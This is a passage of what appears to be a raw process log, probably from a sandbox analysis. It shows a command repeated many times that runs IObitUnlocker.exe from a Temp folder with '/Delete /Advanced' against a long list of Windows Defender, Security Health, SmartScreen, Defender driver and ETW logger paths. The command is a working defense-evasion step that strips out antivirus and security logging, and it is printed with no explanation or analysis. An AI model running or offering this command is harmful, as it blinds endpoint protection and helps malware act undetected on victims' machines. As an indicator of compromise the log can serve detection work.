Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe

C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows 